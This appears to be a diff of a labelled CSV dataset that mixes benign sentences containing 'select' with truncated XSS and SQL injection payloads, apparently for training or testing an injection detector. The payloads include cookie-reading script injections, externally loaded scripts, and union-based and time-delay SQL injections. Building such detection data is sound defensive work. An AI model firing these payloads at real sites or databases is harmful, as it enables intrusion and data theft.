7110",2,SQLi,17721 -<a id=x tabindex=1 onactivate=alert(1)></a>,1,XSS,4156 -select case when 2599 = 7035 then 1 else null end-,2,SQLi,12673 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7421 -1' ) where 8167 = 8167,2,SQLi,22457 -) waitfor delay '0:0:20' --,2,SQLi,10926 -1' ) where 1363 = 1363,2,SQLi,12559 -"-3822"" ) ) as dftp where 2817 = 2817 union all sel",2,SQLi,19982 -<param onblur=alert(1) tabindex=1 id=x></param><in,1,XSS,6171 -UNION ALL SELECT USER()--,2,SQLi,10650 -"1"" ) ) as chal where 6661 = 6661",2,SQLi,13964 -"-9256"" ) ) union all select 2977,2977,2977,2977,29",2,SQLi,19948 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,5704 -select ( case when ( 7217 = 7631 ) then 7217 else ,2,SQLi,12750 -The tech giant is also a lender for select sellers,0,normal,25366 -"-9371' ) union all select 5900,5900,5900#",2,SQLi,21171 -"<figcaption onbeforecopy=""alert(1)"" contenteditabl",1,XSS,6458 -<meter id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,1794 --9734' ) ) as izbx where 6273 = 6273 union all sel,2,SQLi,14977 --3107' ) where 7782 = 7782 or 8571 = 8571--,2,SQLi,21405 -1 where 3175 = 3175 or 8421 = ( select count ( * ),2,SQLi,18472 -<slot id=x tabindex=1 onbeforeactivate=alert(1)></,1,XSS,6743 -"{""id"":null,""firstName"":""Alisa"",""lastName"":""Maclenn",0,normal,27054 -"1"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ",2,SQLi,18239 -<xss id=x tabindex=1 onfocusout=alert(1)></xss><in,1,XSS,8852 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,17203 -She'll select the appetizer.,0,normal,24440 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4792 -<iframe id=x onfocusin=alert(1)>,1,XSS,4201 -It really will improve your ability to select the ,0,normal,25956 -Select evolve.,0,normal,24775 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8086 +"1"" ) where 8612 = 8612",2,SQLi,16359 +Select a cozy corner.,0,normal,22702 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2613 +"{""id"":null,""firstName"":""Wanni"",""lastName"":""Seat"",""",0,normal,27228 +declare @s varchar(200) select @s = 0x77616974 ...,2,SQLi,10101 +""",(select%20if(count(*)!=-1,benchmark(3000000,MD5(",2,SQLi,11013 +Where's the symphony?,0,normal,23584 +<label onpointerover=alert(1)>XSS</label>,1,XSS,8414 +"{""id"":null,""name"":""Hitmonlee""}",0,normal,26802 +"<div onkeydown=""alert(1)"" contenteditable>test</di",1,XSS,4158 +"1"" ) as eibf where 5026 = 5026 and 4386 = utl_inad",2,SQLi,12675 +"<th onbeforecut=""alert(1)"" contenteditable>test</t",1,XSS,7423 +"1"" union all select null,null,null,null,null,null,",2,SQLi,22454 +)) waitfor delay '0:0:20' --,2,SQLi,10928 +"1' ) ) procedure analyse ( extractvalue ( 5840,con",2,SQLi,12561 +Congratulations to our own @ JulienMid and @ Value,0,normal,26509 +<style>:target {color: red;}</style><menu id=x sty,1,XSS,6173 +"UNION ALL SELECT USER(),SLEEP(5)--",2,SQLi,10652 +"1"" ) or sleep ( 5 ) and ( ""fiag"" like ""fiag",2,SQLi,13966 +1' ) ) ) and 8162 = 1687 and ( ( ( 'tdyr' like 'td,2,SQLi,19946 +"<style>@keyframes x{}</style><map style=""animation",1,XSS,5706 +"-8902 union all select 4339,4339,4339#",2,SQLi,12752 +Modify style.,0,normal,23038 +1'+ ( select onzd where 8452 = 8452 and 2853 = cas,2,SQLi,21169 +<style>:target {transform: rotate(180deg);}</style,1,XSS,6460 +"<em draggable=""true"" ondragleave=""alert(1)"">test</",1,XSS,1795 +1 ) ) as izvy where 2569 = 2569,2,SQLi,14979 +You can then select games from the menu and start ,0,normal,25085 +-5880' ) ) or 2724 in ( ( char ( 113 ) +char ( 113,2,SQLi,19467 +<tbody onpointerout=alert(1)>XSS</tbody>,1,XSS,6745 +"{""id"":null,""name"":""Bat""}",0,normal,27051 +"1%' ) ) or 6979 = like ( 'abcdefg',upper ( hex ( r",2,SQLi,18237 +"<body oncontextmenu=""alert(1)"">test</body>",1,XSS,8854 +"1' ) ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17201 +Randomly select a question.,0,normal,24437 +<template id=x tabindex=1 onbeforeactivate=alert(1,1,XSS,4794 +<animatetransform onpointermove=alert(1)>XSS</anim,1,XSS,4203 +You will be able to find out very basic informatio,0,normal,25062 +Select develop.,0,normal,24772 +"<table onmousemove=""alert(1)"">test</table>",1,XSS,8088 """></SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(8",1,XSS,320 -[a](javascript://%0d%0aconfirm(1);com),1,XSS,9433 -"-9959"" ) where 7073 = 7073 union all select 7073,7",2,SQLi,17924 -"UNION ALL SELECT 1,2,3,4,5,6--",2,SQLi,10568 -Does the House Permanent Select Committee on Intel,0,normal,26234 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,15390 -"select count ( * ) from generate_series ( 1,500000",2,SQLi,14103 -select pg_sleep ( 5 ) ) +',2,SQLi,21816 -( 8266 = 8266 ) *9900,2,SQLi,19623 -Select your vision.,0,normal,24846 -<title onpointermove=alert(1)>XSS</title>,1,XSS,5914 -"<body onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,5615 -"1"" ) ) ) or sleep ( 5 ) and ( ( ( ""hdis"" like ""hdi",2,SQLi,17355 -<style>:target {color:red;}</style><hr id=x style=,1,XSS,7233 -<noembed onpointermove=alert(1)>XSS</noembed>,1,XSS,5494 --4136' ) ) as cczp where 7052 = 7052 union all sel,2,SQLi,15761 -Operators conveniently omit this evidence when quo,0,normal,25809 -[a](j a v a s c r i p t:prompt(document.cookie)),1,XSS,9409 -Select gift.,0,normal,23031 +[a](javascript:alert(document.domain&#41;),1,XSS,9435 +1' ) ) ( select ( case when ( 4587 = 4587 ) then r,2,SQLi,17922 +"UNION ALL SELECT 1,2,3,4,5,6,7,8--",2,SQLi,10570 +"1"" ) where 1410 = 1410",2,SQLi,19955 +1'|| ( select 'gmkp' where 6016 = 6016,2,SQLi,15392 +1'+ ( select 'zkuf' where 3591 = 3591 or char ( 11,2,SQLi,14105 +"-2460%"" ) or ( 2660 = 5767 ) *5767 and ( ""%"" = """,2,SQLi,21038 +1 ) where 8813 = 8813,2,SQLi,19621 +Select your mission.,0,normal,24843 +"<style>@keyframes x{}</style><kbd style=""animation",1,XSS,5916 +"<wbr onmouseup=""alert(1)"">test</wbr>",1,XSS,5617 +select ( case when ( 5152 = 7853 ) then 5152 else ,2,SQLi,18541 +"<noembed onmousemove=""alert(1)"">test</noembed>",1,XSS,7235 +<datalist onpointermove=alert(1)>XSS</datalist>,1,XSS,5496 +"-6407' ) or elt ( 1631 = 4946,4946 ) and ( 'jpnz' ",2,SQLi,15763 +Or remain a niche market available only in select ,0,normal,25806 +<javascript:prompt(document.cookie)>,1,XSS,9411 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20791 <iframe src=javascript&colon;alert&lpar;document&p,1,XSS,331 -) or '1'='1'#,2,SQLi,9979 -*/</script>'>alert(1)/*<script/1=',1,XSS,9005 -declare @q nvarchar (4000) select @q =,2,SQLi,10171 -<map onpointerout=alert(1)>XSS</map>,1,XSS,3117 -<input4 onpointerover=alert(1)>XSS</input4>,1,XSS,5791 -"1 or extractvalue ( 1297,concat ( 0x5c,0x7171706a7",2,SQLi,16216 -"<time draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,3332 +) or ('1'='1--,2,SQLi,9981 +*/alert(1)</script><script>/*,1,XSS,9007 +select name from syscolumns where id = (sele ...,2,SQLi,10173 +"<font draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,3118 +"<style>@keyframes x{}</style><iframe style=""animat",1,XSS,5793 +select ( case when ( 3672 = 8360 ) then 3672 else ,2,SQLi,16218 +"<footer onclick=""alert(1)"">test</footer>",1,XSS,3334 "`""'><img src=xxx:x onerror\x0A=javascript:alert(1)",1,XSS,614 "{""id"":null,""name"":""hollow""}",0,normal,27403 -"<keygen oncopy=""alert(1)"" contenteditable>test</ke",1,XSS,7580 +"<s onbeforepaste=""alert(1)"" contenteditable>test</",1,XSS,7582 "<a style=""behavior:url(#default#AnchorClick);"" fol",1,XSS,723 -The International Olympic Committee will select a ,0,normal,25424 -"<td oncontextmenu=""alert(1)"">test</td>",1,XSS,5807 -<output onpointermove=alert(1)>XSS</output>,1,XSS,6159 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,1861 --5830' ) as fivy where 2173 = 2173 or 5903 = ( 'qq,2,SQLi,15977 -select ( case when ( 1726 = 4080 ) then 1726 else ,2,SQLi,22058 -""") and 0=benchmark(3000000,MD5(1))%20%23",2,SQLi,11042 -"<div onkeypress=""alert(1)"" contenteditable>test</d",1,XSS,8599 -"<button onmouseup=""alert(1)"">test</button>",1,XSS,5431 -ORDER BY 30#,2,SQLi,10303 -"1"" ) where 1833 = 1833",2,SQLi,16273 -select,0,normal,26605 -"Select "" Submit Payment request "" to send the requ",0,normal,25685 -1 ) ) as rhwg where 8843 = 8843,2,SQLi,16551 -"-9119"" ) where 9237 = 9237 or 8571 = 8571--",2,SQLi,20708 -<figcaption onpointerout=alert(1)>XSS</figcaption>,1,XSS,7497 -"-4694' ) where 1501 = 1501 union all select 1501,1",2,SQLi,21429 -Filter spam emails.,0,normal,22788 -select,0,normal,26546 -"1' ) and 3824 = benchmark ( 5000000,md5 ( 0x765556",2,SQLi,20836 -1'+ ( select qsmo where 3172 = 3172,2,SQLi,18862 -"<menu onmouseup=""alert(1)"">test</menu>",1,XSS,2260 -<style>:target {color: red;}</style><shadow id=x s,1,XSS,3465 -"-1235"" ) ) or 4144 = ( select upper ( xmltype ( ch",2,SQLi,19667 -Where's the art show?,0,normal,23580 -"-4291"" ) ) or 5023 = ctxsys.drithsx.sn ( 5023, ( c",2,SQLi,12114 -"<fieldset onmouseleave=""alert(1)"">test</fieldset>",1,XSS,6901 -select * from users where id = '1'<@.. union selec,2,SQLi,11563 -"admin"" or ""1""=""1",2,SQLi,9926 -youtube. com / watch? v = rBrx9D … - New GTA Lin,0,normal,25053 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,12530 -<STYLE>@import'http://.rocks/.css';</STYLE>,1,XSS,7875 -<hr onpointerover=alert(1)>XSS</hr>,1,XSS,6126 -1 and 9198 = 9198--,2,SQLi,18358 -<scr<script>ipt>alert('XSS');</scr</script>ipt>,1,XSS,1279 -1,0,normal,26657 -1'|| ( select 'asfl' from dual where 5846 = 5846 o,2,SQLi,20916 -"1' ) ) ) and make_set ( 7539 = 3946,3946 ) and ( (",2,SQLi,16846 -1' rlike ( select ( case when ( 7689 = 7689 ) then,2,SQLi,13865 -Users seem to have the ability to toggle on and of,0,normal,25192 -1' ) ) ) or 2367 = ( select count ( * ) from rdb$f,2,SQLi,19291 -AND 1=1--,2,SQLi,10217 -"1"" ) ) ) or extractvalue ( 1297,concat ( 0x5c,0x71",2,SQLi,14591 -) RLIKE SLEEP(5)-- 1337,2,SQLi,11211 -"),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:20",2,SQLi,10885 -"-4355"" ) ) ) or 9323 = 9323#",2,SQLi,14533 -1' ) ) ) and char ( 111 ) ||char ( 77 ) ||char ( 1,2,SQLi,13572 -"<small onmousedown=""alert(1)"">test</small>",1,XSS,6058 -1' ) ) as kfnt where 8090 = 8090 procedure analyse,2,SQLi,21222 -"1%' ) ) procedure analyse ( extractvalue ( 9255,co",2,SQLi,12935 -"1"" ) or 2367 = ( select count ( * ) from rdb$field",2,SQLi,19635 -"<head onmouseleave=""alert(1)"">test</head>",1,XSS,7019 -sleep ( __TIME__ ) #,2,SQLi,12084 -1' ) ) and ( 1427 = 5813 ) *5813 and ( ( 'estb' li,2,SQLi,20244 -"<nobr onclick=""alert(1)"">test</nobr>",1,XSS,5689 -"{""id"":null,""firstName"":""Chenghong"",""lastName"":""Teo",0,normal,27206 -‘ or 3=3 --,2,SQLi,10185 +"1, ( begin if ( 8340 = 8340 ) then dbms_lock.sleep",2,SQLi,18664 +"<a onkeypress=""alert(1)"" contenteditable>test</a>",1,XSS,5809 +"<style onmousemove=""alert(1)"">test</style>",1,XSS,6161 +"<command oncontextmenu=""alert(1)"">test</command>",1,XSS,1862 +1' ) where 2775 = 2775 or 2633 = dbms_pipe.receive,2,SQLi,15979 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,22056 +""")) and 0=benchmark(3000000,MD5(1))%20--",2,SQLi,11044 +<embed src=/ onload=alert(1)>,1,XSS,8601 +"d=""alert('');\"")""",1,XSS,5433 +ORDER BY 1,2,SQLi,10305 +1' where 8729 = 8729,2,SQLi,18776 +1' ) ) ) and 3707 = ( select count ( * ) from sysi,2,SQLi,22297 +1' ) ) ) or 7552 = ( select count ( * ) from rdb$f,2,SQLi,16549 +1 ) where 9708 = 9708,2,SQLi,20706 +<label id=x tabindex=1 onbeforeactivate=alert(1)><,1,XSS,7499 +1' ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ,2,SQLi,21427 +Merge the records.,0,normal,22785 +"1"" ) where 9115 = 9115",2,SQLi,18359 +-2920' ) ) or 2724 in ( ( char ( 113 ) +char ( 113,2,SQLi,20834 +1' in boolean mode ) and 4595 = 4595#,2,SQLi,18860 +"<multicol onclick=""alert(1)"">test</multicol>",1,XSS,2261 +<details onpointerup=alert(1)>XSS</details>,1,XSS,3467 +1' ) where 6222 = 6222 or ( select * from ( select,2,SQLi,19665 +Sort the tangled cables.,0,normal,22734 +"1%"" or 1022 = ( select count ( * ) from all_users ",2,SQLi,12116 +<option onpointerover=alert(1)>XSS</option>,1,XSS,6903 +select * from users where id = 1 <@.$ union select,2,SQLi,11565 +"admin"" or ""1""=""1""#",2,SQLi,9928 +Select your trade.,0,normal,25050 +"1"" ) waitfor delay '0:0:5' and ( ""hhzy"" like ""hhzy",2,SQLi,12532 +"<select onbeforecut=""alert(1)"" contenteditable>tes",1,XSS,7877 +"<mark onbeforecopy=""alert(1)"" contenteditable>test",1,XSS,6128 +1' or 8421 = ( select count ( * ) from generate_se,2,SQLi,18356 +"<script>alert(String.fromCharCode(88,83,83))</scri",1,XSS,1280 +1,0,normal,26654 +"-2168"" ) ) union all select 4935,4935,4935,4935,49",2,SQLi,20914 +"1"" or sleep ( 5 )",2,SQLi,16844 +1 ) ) and 3754 = ( select upper ( xmltype ( chr ( ,2,SQLi,13867 +Values for select cuts rose further after gaining ,0,normal,25189 +-2372' or 1783 = 2656,2,SQLi,19289 +AND 1=1#,2,SQLi,10219 +select case when 4537 = 8418 then 1 else null end-,2,SQLi,14593 +)) RLIKE SLEEP(5) AND (('1337'='1337,2,SQLi,11213 +"""),NULL,NULL,NULL,NULL)%20waitfor%20delay%20'0:0:2",2,SQLi,10887 +1 ) ) as trin where 8843 = 8843,2,SQLi,14535 +1 ) ) as sipp where 1999 = 1999 and ( select * fro,2,SQLi,13574 +<canvas id=x tabindex=1 onbeforeactivate=alert(1)>,1,XSS,6060 +"-5757%"" ) or 6872 = 6872 and ( ""%"" = """,2,SQLi,21220 +"1"" or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,12937 +"Plus, with Select and Go, you can select the rooms",0,normal,25769 +"<listing onmousemove=""alert(1)"">test</listing>",1,XSS,7021 +1 ) as clye where 7842 = 7842 and char ( 109 ) ||c,2,SQLi,12086 +"1' ) ) or row ( 1045,7562 ) > ( select count ( * )",2,SQLi,20242 +<body onpointerleave=alert(1)>XSS</body>,1,XSS,5691 +"{""id"":null,""firstName"":""Low"",""lastName"":""Bee"",""spe",0,normal,27204 +"a"" or 1=1--",2,SQLi,10187 "<isindex x=""javascript:"" onmouseover=""alert(XSS)"">",1,XSS,319 <xss contenteditable onbeforeinput=alert(1)>test,1,XSS,52 -"<rt onkeydown=""alert(1)"" contenteditable>test</rt>",1,XSS,8501 -",NULL)%20waifor%20delay%20'0:0:20'%20/*",2,SQLi,10857 +<picture id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,8503 +""",NULL)%20waitfor%20delay%20'0:0:20'%20--",2,SQLi,10859 <xss onpointerrawupdate=alert(1) style=display:blo,1,XSS,93 -1' ) where 8086 = 8086 and 1430 = 7941--,2,SQLi,22007 -"<u onmouseup=""alert(1)"">test</u>",1,XSS,8219 -"admin"" #",2,SQLi,9924 -select current_setting('log_statement');,2,SQLi,22505 -<form><button formaction=javascript&colon;alert(1),1,XSS,4330 -"While you're still online, select the book you wan",0,normal,25128 -1%' ) ) ) and 2716 = ( select count ( * ) from sys,2,SQLi,16854 -"Buy 1, get 1 free* on select Nature Made® vitamins",0,normal,26301 -"UNION ALL SELECT 1,2,3,4,5,6#",2,SQLi,10538 -"AND ELT(1337=1337,SLEEP(5)) AND 1337"" LIKE ""1337",2,SQLi,11278 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9",2,SQLi,10511 -<picture id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,7445 -1'+ ( select mkbv where 1648 = 1648 and 9254 = ( s,2,SQLi,20051 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,20762 -"<marquee onmousemove=""alert(1)"">test</marquee>",1,XSS,8555 -AND 1=1 AND '%'=',2,SQLi,10221 --6327' ) ) union all select 2685--,2,SQLi,19410 -"select count ( * ) from all_users t1,all_users t2,",2,SQLi,13455 -))) waitfor delay '0:0:20' /*,2,SQLi,22493 -"1"" and ( select * from ( select ( sleep ( 5 ) ) ) ",2,SQLi,21086 -"<param onkeydown=""alert(1)"" contenteditable>test</",1,XSS,5341 -) or ( a = a,2,SQLi,11660 -1' ) ) ) rlike ( select * from ( select ( sleep ( ,2,SQLi,18241 --2210' or 5903 = ( 'qqpjq'|| ( select case 5903 wh,2,SQLi,18784 -<tt onpointerup=alert(1)>XSS</tt>,1,XSS,7823 -<script> document.getElementById(%22safe123%22).se,1,XSS,9268 -<embed src=javascript:alert(1)>,1,XSS,9168 -"1' ) ) and updatexml ( 3393,concat ( 0x2e,0x717170",2,SQLi,14886 -<marquee id=x tabindex=1 onbeforeactivate=alert(1),1,XSS,7972 -") AND ELT(1337=1337,SLEEP(5)) AND (""1337""=""1337",2,SQLi,11271 -"To unfreeze the frames, select ""View,"" then select",0,normal,25254 -#ERROR!,2,SQLi,10987 -"1%' and make_set ( 8403 = 8403,8899 ) and '%' = '",2,SQLi,15448 -<section id=x tabindex=1 onactivate=alert(1)></sec,1,XSS,3870 -"1%"" ) union all select null,null#",2,SQLi,16758 -"1' in boolean mode ) union all select null,null#",2,SQLi,16954 -"-7939"" ) or 3958 = 6909",2,SQLi,18986 -I'm considering where to have a family outing.,0,normal,23909 -Select the best camera settings for photos.,0,normal,24051 -1' where 5819 = 5819 and ( 1275 = 4759 ) *4759--,2,SQLi,17729 -"<figure onmouseout=""alert(1)"">test</figure>",1,XSS,2594 -"1' ) where 6489 = 6489 or updatexml ( 1808,concat ",2,SQLi,19634 -><script+src=https://translate.yandex.net/api/v1.5,1,XSS,9781 -Select a theme for the party.,0,normal,23992 +"{""id"":null,""firstName"":""Isaac"",""lastName"":""Soon"",""",0,normal,27494 +<font onpointerout=alert(1)>XSS</font>,1,XSS,8221 +"admin"" or ""1""=""1",2,SQLi,9926 +Select a workout routine to follow.,0,normal,24218 +"<hgroup onpaste=""alert(1)"" contenteditable>test</h",1,XSS,4332 +Please unban pubg and ignore the lame excuses of P,0,normal,26485 +That lets you select a charity and then donates 0.,0,normal,25492 +"By the volume slider for MIDI there will be a "" Se",0,normal,26298 +"UNION ALL SELECT 1,2,3,4,5,6,7,8#",2,SQLi,10540 +"WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 1337",2,SQLi,11280 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11",2,SQLi,10513 +"<style>@keyframes x{}</style><script style=""animat",1,XSS,7447 +1 ) ) as bvij where 7913 = 7913,2,SQLi,20760 +"1' ) ) ) union all select null,null--",2,SQLi,20045 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,8557 +AND 1083=1083 AND (1427=1427,2,SQLi,10223 +-9577'|| ( select 'vloa' from dual where 7184 = 71,2,SQLi,19408 +1' ) ) as vuzt where 4971 = 4971,2,SQLi,13457 +"1%"" ) ) and 2853 = cast ( ( chr ( 113 ) ||chr ( 11",2,SQLi,20142 +"1"" ) union all select null,null,null,null,null,nul",2,SQLi,21084 +"<style>@keyframes x{}</style><basefont style=""anim",1,XSS,5343 +"select * from users where id = 1 or 1#""; or 1 = 1 ",2,SQLi,11662 +"1"" ) and char ( 120 ) ||char ( 106 ) ||char ( 117 ",2,SQLi,18239 +1 ) where 9078 = 9078 rlike sleep ( 5 ) #,2,SQLi,18782 +<style>:target {color: red;}</style><meter id=x st,1,XSS,7825 +<script> var xdr = new ActiveXObject(%22Microsoft.,1,XSS,9270 +"<feImage><set attributeName=""xlink:href"" to=""data:",1,XSS,9170 +1 ) ) as debc where 7428 = 7428 union all select n,2,SQLi,14888 +<video autoplay controls onseeked=alert(1)><source,1,XSS,7974 +"))) AND ELT(1337=1337,SLEEP(5)) AND (((1337""=""1337",2,SQLi,11273 +Select carefully now.,0,normal,24800 +"""+if(benchmark(3000000,MD5(1)),NULL,NULL),NULL,NUL",2,SQLi,10989 +"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,15450 +"<dfn oncopy=""alert(1)"" contenteditable>test</dfn>",1,XSS,3872 +Filter out irrelevant comments from the post.,0,normal,22894 +1' where 4185 = 4185 procedure analyse ( extractva,2,SQLi,16952 +1' ) ) ) rlike ( select ( case when ( 4076 = 4881 ,2,SQLi,20993 +I'll select a new painting to hang in the living r,0,normal,23906 +Select the perfect gift for a friend.,0,normal,24048 +1 ) ) order by 1--,2,SQLi,17063 +"<track onkeydown=""alert(1)"" contenteditable>test</",1,XSS,2595 +-7901 ) order by 1--,2,SQLi,19632 +><script+src=https://api.vk.com/method/wall.get?ca,1,XSS,9783 +Select the right shades for the design.,0,normal,23989 "{""id"":null,""name"":""ThundurusIncarnate Forme""}",0,normal,27460 --4001' ) ) or 5634 = 4044--,2,SQLi,19269 -Please select a wedding band.,0,normal,24389 -"<dt draggable=""true"" ondrag=""alert(1)"">test</dt>",1,XSS,4527 -You can select to route using toll roads or avoidi,0,normal,25076 -"-9596 ) where 3425 = 3425 union all select 3425,34",2,SQLi,13497 -<dl onblur=alert(1) tabindex=1 id=x></dl><input au,1,XSS,8485 -"1 ) procedure analyse ( extractvalue ( 9255,concat",2,SQLi,12713 -"{""id"":null,""firstName"":""Jackie"",""lastName"":""Wee"",""",0,normal,26983 -) AS 1337 WHERE 1337=1337 AND (SELECT 1337 FROM (S,2,SQLi,11185 -<style>:target {color:red;}</style><tbody id=x sty,1,XSS,6051 -"1"" ) as jscj where 2308 = 2308 or 4915 = ( select ",2,SQLi,16571 -<style>:target {color: red;}</style><hgroup id=x s,1,XSS,8847 -<article onpointerout=alert(1)>XSS</article>,1,XSS,8167 -1 ) and 2716 = ( select count ( * ) from sysusers ,2,SQLi,13337 -"<details/open/ontoggle=""alert`1`"">",1,XSS,9704 -1'|| ( select 'yuku' where 7480 = 7480,2,SQLi,14299 +-6377' or 4747 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,17060 +Select the best wedding hairstyle.,0,normal,24386 +"<form onclick=""alert(1)"">test</form>",1,XSS,4529 +"You don't need to select quests to earn loot, thou",0,normal,25073 +1' and ( 3020 = 3020 ) *6703 and 'tmng' like 'tmng,2,SQLi,13499 +<style>:target {transform: rotate(180deg);}</style,1,XSS,8487 +"-5575"" union all select 8665,8665,8665,8665,8665,8",2,SQLi,12715 +Select the ideal gift for a loved one.,0,normal,24050 +`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(S,2,SQLi,11187 +"<canvas onmouseout=""alert(1)"">test</canvas>",1,XSS,6053 +Typical usage would be to allow a user to select a,0,normal,25230 +"<style>:target {color:red;}</style><q id=x style=""",1,XSS,8849 +<object onpointerdown=alert(1)>XSS</object>,1,XSS,8169 +1' ) ) as xebq where 7959 = 7959 union all select ,2,SQLi,13339 "data:text/html,<script>alert(0)</script>",1,XSS,9706 -ORDER BY 24--,2,SQLi,10266 -"<del onpaste=""alert(1)"" contenteditable>test</del>",1,XSS,7637 -call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,21675 -"UNION ALL SELECT 1,2,3--",2,SQLi,10565 -"1' or elt ( 6272 = 6272,sleep ( 5 ) ) and 'wdoi' =",2,SQLi,22307 -1'+ ( select 'vbqo' where 5630 = 5630 procedure an,2,SQLi,13204 -"1 ) where 1513 = 1513 and 8148 = like ( 'abcdefg',",2,SQLi,13411 -"<menuitem onkeydown=""alert(1)"" contenteditable>tes",1,XSS,5397 -1' ) where 2808 = 2808,2,SQLi,19194 -"1%"" ) ) ) or updatexml ( 1808,concat ( 0x2e,0x7171",2,SQLi,15596 -An attempt has been made to select an asymmetric u,0,normal,26373 -"<track onmousemove=""alert(1)"">test</track>",1,XSS,3000 -<svg><fieldset onload=alert(1)></fieldset>,1,XSS,4747 -<style>:target {color:red;}</style><title id=x sty,1,XSS,8533 -"-2876"" ) or make_set ( 5306 = 6127,6127 ) and ( ""u",2,SQLi,18281 -"-7258"" ) as wjjr where 2110 = 2110 union all selec",2,SQLi,18282 -"1"" ) as gjlv where 1983 = 1983 and sleep ( 5 ) #",2,SQLi,15766 -"<style>@keyframes x{}</style><details style=""anima",1,XSS,5692 -"{""id"":null,""firstName"":""Suzie"",""lastName"":""Sng"",""a",0,normal,27171 -"<header onmouseleave=""alert(1)"">test</header>",1,XSS,3018 -1%' ) and 6969 = ( select 6969 from pg_sleep ( 5 ),2,SQLi,18013 -1 and 6537 = dbms_pipe.receive_message ( chr ( 76 ,2,SQLi,15286 -<style id=x tabindex=1 onbeforedeactivate=alert(1),1,XSS,4076 -1' where 1017 = 1017 and 7756 = dbms_utility.sqlid,2,SQLi,16361 -<button onSelect=javascript:alert(1)>,1,XSS,9665 -"1"" ) ) or ( select 9173 from ( select count ( * ) ",2,SQLi,20982 -ORDER BY 4,2,SQLi,10308 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12962 -1' ) ) and 8189 = ( select count ( * ) from sysibm,2,SQLi,12443 -"{""id"":null,""name"":""Purrloin""}",0,normal,27215 -<dir id=x tabindex=1 onfocusin=alert(1)></dir>,1,XSS,3496 --8519%' ) ) or 4493 = utl_inaddr.get_host_address ,2,SQLi,15313 -"-9166"" ) as hlre where 4768 = 4768 or 5903 = ( 'qq",2,SQLi,19651 -"select count ( * ) from domain.domains as t1,domai",2,SQLi,14714 -"<input TYPE=""IMAGE"" SRC=""javascript:document.vulne",1,XSS,1486 -Where's your SQL advice?,0,normal,23413 -"iif ( 4460 = 1610,1,1/0 )",2,SQLi,18825 -<u id=x tabindex=1 onbeforeactivate=alert(1)></u>,1,XSS,4268 --7742 ) as tgzq where 7842 = 7842 or 2062 = 1563,2,SQLi,16408 -select ( case when ( 4755 = 4784 ) then 1 else 475,2,SQLi,15881 -"<xss onmouseleave=""alert(1)"" style=display:block>t",1,XSS,77 -<address onpointerleave=alert(1)>XSS</address>,1,XSS,3047 -<section id=x tabindex=1 onfocus=alert(1)></sectio,1,XSS,2037 -"<shadow ondblclick=""alert(1)"">test</shadow>",1,XSS,3066 -PARIS (Reuters) - Canada is set to select Airbus G,0,normal,25790 -Select finish.,0,normal,24584 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,6376 -"<th oncut=""alert(1)"" contenteditable>test</th>",1,XSS,7872 -"iif ( 1305 = 5656,1,1/0 )",2,SQLi,22242 -"<option oncopy=""alert(1)"" contenteditable>test</op",1,XSS,6928 -"&lt;SCRIPT a=\""&gt;\"" SRC=\""http&#58;//ha&#46;cker",1,XSS,1042 -Select your observe.,0,normal,24980 -<keygen onpointerover=alert(1)>XSS</keygen>,1,XSS,6992 -"<big draggable=""true"" ondragend=""alert(1)"">test</b",1,XSS,4251 -<html onpointermove=alert(1)>XSS</html>,1,XSS,7551 -"<legend onmouseover=""alert(1)"">test</legend>",1,XSS,8423 -"<table BACKGROUND=""javascript:document.vulnerable=",1,XSS,1502 -<element onpointerover=alert(1)>XSS</element>,1,XSS,3854 -"<button onmouseenter=""alert(1)"">test</button>",1,XSS,5814 -Home Depot: Up to 40% off select kitchen and bath ,0,normal,26091 -Where's the counseling appointment?,0,normal,23661 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7645 -"1"" ) ) as wwqj where 3249 = 3249 and 9254 = ( sele",2,SQLi,16498 -"""),NULL,NULL,NULL,NULL,NULL)%20waitfor%20delay%20'",2,SQLi,10896 -Select your position.,0,normal,24853 -1 ) where 2679 = 2679 or 4915 = ( select count ( *,2,SQLi,19974 -<shadow id=x tabindex=1 onfocusin=alert(1)></shado,1,XSS,3599 -"1"" ) ) ) and 2006 = 2006",2,SQLi,20679 -"<img SRC=""javascript:document.vulnerable=true;""",1,XSS,1481 -"1%"" ) and 8626 = 3626#",2,SQLi,15501 -"-6971"" or 4747 = dbms_utility.sqlid_to_sqlhash ( (",2,SQLi,17121 -"<blink onkeypress=""alert(1)"" contenteditable>test<",1,XSS,7411 -"1, ( select ( case when ( 9644 = 9644 ) then dbms_",2,SQLi,15537 -"-3270%' or elt ( 9404 = 3498,3498 ) and '%' = '",2,SQLi,16079 -<style>:target {color:red;}</style><details id=x s,1,XSS,6279 +"{""id"":null,""firstName"":""Li Sin"",""lastName"":""Tan"",""",0,normal,27320 +-3582' 